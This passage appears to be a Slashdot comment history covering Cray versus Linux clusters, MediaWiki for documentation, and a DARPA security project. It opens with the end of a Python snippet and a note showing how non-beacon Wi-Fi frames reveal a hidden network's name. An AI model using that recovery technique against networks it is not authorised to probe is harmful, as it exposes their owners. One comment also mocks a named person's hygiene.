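    print("leaked by the rest of the exchange:", leaked_ssids(CAPTURE))
```

    Against this capture the beacon yields an empty name and the other three frames yield CorpNet, which is the whole of the comment's point: a tool that only reads beacons is fooled, a tool that reads the next three frame types is not.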

  22. These are not the Droids you're looking for.... on Cray CTO: Linux clusters don't play in HPC · · Score: 2, Insightful
    Buy MY droids instead..... Move along.....


    His rhetoric is quite predictable, actually. He talks at some length about how and why clusters of PCs can't get the job done, and how clustering is inherently inferior to a REAL SuperComputer, then goes on to describe how their new product (which sounds surprisingly like a cluster of proprietary machines) can work. Repeat the above as it applies to the management software.


    If clustering doesn't work, and Supers are better / cheaper, explain why large companies (Pixar, NVidia, ...) and Government Labs (Los Alamos National Labs, Sandia National Labs, ...) have invested, and are continuing to invest in and support their clusters.


    Note that this does NOT mean that clusters are suitable for ALL traditional SuperComputing tasks. It really depends on the problem. If the problem is better solved with a vector processor, then a vector machine (like a Cray) is what you want. If the problem is solvable in parallel, then a cluster might be the right answer.

  23. Wiki is what you want.... on A Powerful, but Minimal Document Markup Language? · · Score: 2, Informative
    Specifically, IMNSHO, MediaWiki. This is the software used by the Wikipedia and other projects, which ensures that it is under active development, and getting a lot of attention. Among other features, it has
    • Extremely simple, yet rich markup
    • Automagical Tables of Contents
    • Easy support for tables
    • Support for TeX markup for mathematical formulae (if needed)
    • Support for embedded images
    • Ability to diff with previous iterations of an article and roll back changes if needed

    A wiki brings a lot to the table to facilitate documentation, and excels at cooperative documentation. We're using MediaWiki software internally with some success. Installation is not difficult (requires MySQL, PHP and Apache) and is well documented. Any web browser is used to view and / or edit documents, and the resultant HTML may be saved and viewed off-line.
  24. Re:wow man on Recoverable File Archiving with Free Software? · · Score: 0
    ...my health care provider doesn't cover ideologuectomies. They claim that it doesn't threaten your physical life, just your social one...


    Ah.... I've met RMS a number of times, and having once made the mistake of standing downwind, am familiar with this problem. Try Soap and Water, augmented with a long-handled stiff brush. Pardon the Pun, but Lather, Rinse, Repeat. Works wonders for your complexion, with immediate secondary positive effects on the ol' social life...
  25. If a project falls.... on DARPA-Funded Linux Security Hub Withers · · Score: 4, Interesting
    If a project fails, and nobody's ever even heard of it, has it really failed?

    I know Crispin Cowan personally, and I have never heard of this project! Maybe some of the DARPA funding should have gone to advertising, publicity, or (God forbid) Marketing?